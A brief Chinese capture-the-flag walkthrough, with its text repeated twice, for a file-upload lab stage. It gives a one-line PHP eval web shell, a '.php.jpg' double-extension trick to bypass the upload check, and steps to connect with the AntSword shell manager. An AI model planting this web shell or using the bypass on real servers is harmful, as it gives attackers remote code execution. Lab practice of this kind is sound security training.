进入靶场
点击pass1
查看提示
既然是上传文件,先构造一句话木马,便于用蚁剑连接
<?php @eval($_POST[123])?>
上传木马
文件后缀写为.php.jpg
右键复制图片地址
打开蚁剑连接
先点击测试连接,显示成功后,再点击添加即可
直接在里面找flag即可
文件后缀写为php.jpg即可绕过检查又可建立连接
进入靶场
点击pass1
查看提示
既然是上传文件,先构造一句话木马,便于用蚁剑连接
<?php @eval($_POST[123])?>
上传木马
文件后缀写为.php.jpg
右键复制图片地址
打开蚁剑连接
先点击测试连接,显示成功后,再点击添加即可
直接在里面找flag即可
文件后缀写为php.jpg即可绕过检查又可建立连接